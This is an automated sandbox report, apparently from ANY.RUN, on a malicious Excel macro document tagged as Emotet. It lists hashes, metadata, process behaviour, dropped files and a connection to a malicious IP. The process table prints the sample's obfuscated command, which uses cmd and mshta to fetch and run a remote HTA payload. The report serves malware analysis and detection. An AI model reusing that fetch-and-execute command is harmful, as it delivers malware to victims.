analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls

Full analysis: https://app.any.run/tasks/e7699586-391f-4c6f-b885-16b55b30c801
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 25, 2022, 04:00:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros40
emotet-doc
emotet
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 20 19:00:43 2022, Last Saved Time/Date: Thu Jan 20 19:07:37 2022, Security: 0
MD5:

3F7F1F6050609317474B8F48EFA00E88

SHA1:

C95BFBC3794A4371D3B5A6702052D662DEE19A15

SHA256:

ADE5C2C45C5BBAE939364326AE43A74C8B0C93307B7C653B12B80CBE8E891B70

SSDEEP:

1536:bpEk3hbdlylKsgqopeJBWhZFGkE+cL2NdA8eXZiozeOgXVZKyaZpvyR1kZkJvU+:bCk3hbdlylKsgqopeJBWhZFGkE+cL2Nr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2256)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2256)
  • SUSPICIOUS

    • Checks supported languages

      • cmd.exe (PID: 492)
      • mshta.exe (PID: 2052)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 492)
    • Reads default file associations for system extensions

      • EXCEL.EXE (PID: 2256)
    • Reads the computer name

      • mshta.exe (PID: 2052)
    • Reads Microsoft Outlook installation path

      • mshta.exe (PID: 2052)
  • INFO

    • Reads the computer name

      • EXCEL.EXE (PID: 2256)
    • Checks supported languages

      • EXCEL.EXE (PID: 2256)
    • Creates files in the user directory

      • EXCEL.EXE (PID: 2256)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2256)
    • Reads internet explorer settings

      • mshta.exe (PID: 2052)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: xXx
LastModifiedBy: xXx
Software: Microsoft Excel
CreateDate: 2022:01:20 19:00:43
ModifyDate: 2022:01:20 19:07:37
Security: None
CodePage: Windows Cyrillic
Company: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • Sheet2
  • Sheet1
  • BLC
HeadingPairs:
  • Worksheets
  • 2
  • Excel 4.0 Macros
  • 1
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs mshta.exe

Process information

PID
CMD
Path
Indicators
Parent process
2256"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
492cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.htmlC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2052mshta http://0xb907d607/fer/fe2.htmlC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Total events
1 942
Read events
1 831
Write events
89
Delete events
22

Modification events

(PID) Process:(2256) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:writeName::d9
Value:
3A643900D0080000010000000000000000000000
(PID) Process:(2256) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2256) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(2256) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(2256) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(2256) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(2256) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(2256) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(2256) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(2256) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
Executable files
0
Suspicious files
6
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
2256EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRE41A.tmp.cvr
MD5:
SHA256:
2256EXCEL.EXEC:\Users\admin\Desktop\518C90C4.tmpdocument
MD5:9B747CC05AD8C81F51522255A2CC6C9E
SHA256:C7269430D011B15F1F88106BFA3D49E1C16A6F1DAB1C07CFE2FB8E88658B4C42
2256EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.datini
MD5:105A209345F69A8DF243BCB9A739ABC2
SHA256:C114D70146ED4D9DA72D86BD4E967168433A825020139060BC3E630F58DE83C9
2256EXCEL.EXEC:\Users\admin\Desktop\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xlsdocument
MD5:9B747CC05AD8C81F51522255A2CC6C9E
SHA256:C7269430D011B15F1F88106BFA3D49E1C16A6F1DAB1C07CFE2FB8E88658B4C42
2256EXCEL.EXEC:\Users\admin\Desktop\1F341000document
MD5:60458418E952EE40DD239C3257D7756F
SHA256:881E69D7F1575FA7AC673F97BBE1A5A9999B9F9097BACC3F4B067D0F5DF3C047
2256EXCEL.EXEC:\Users\admin\Desktop\5E541000document
MD5:1873D016957A164FE280F85FF82B8483
SHA256:998201132EB55DE85F31EB58A072E9CC5AE541D3E5965ED78FD30BE4BDA65BCE
2256EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF329815D889B23548.TMPatn
MD5:CDFB84B601CD88D28A25B871ABD3BEC1
SHA256:DEA75B3664ECD4E1AA6329704610C7712C90633D8BF552F00724A2FF372C4C3E
2256EXCEL.EXEC:\Users\admin\Desktop\50541000document
MD5:02ED98A4D8AAF1F8F62CC6ACD443878A
SHA256:9E4C39BF4FF2B983A13BB865031C569CBC9917A933C289E87128CD339BF213F5
2256EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls.LNKlnk
MD5:5FB7BB387E0B5A7F84AC56BA4BA03743
SHA256:54A2A7FA53152BD7710BE011404584F4E244985BF0A8B89CFB99B852CDA4C0B6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2052
mshta.exe
GET
185.7.214.7:80
http://185.7.214.7/fer/fe2.html
FR
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2052
mshta.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious

DNS requests

No data

Threats

No threats detected
No debug info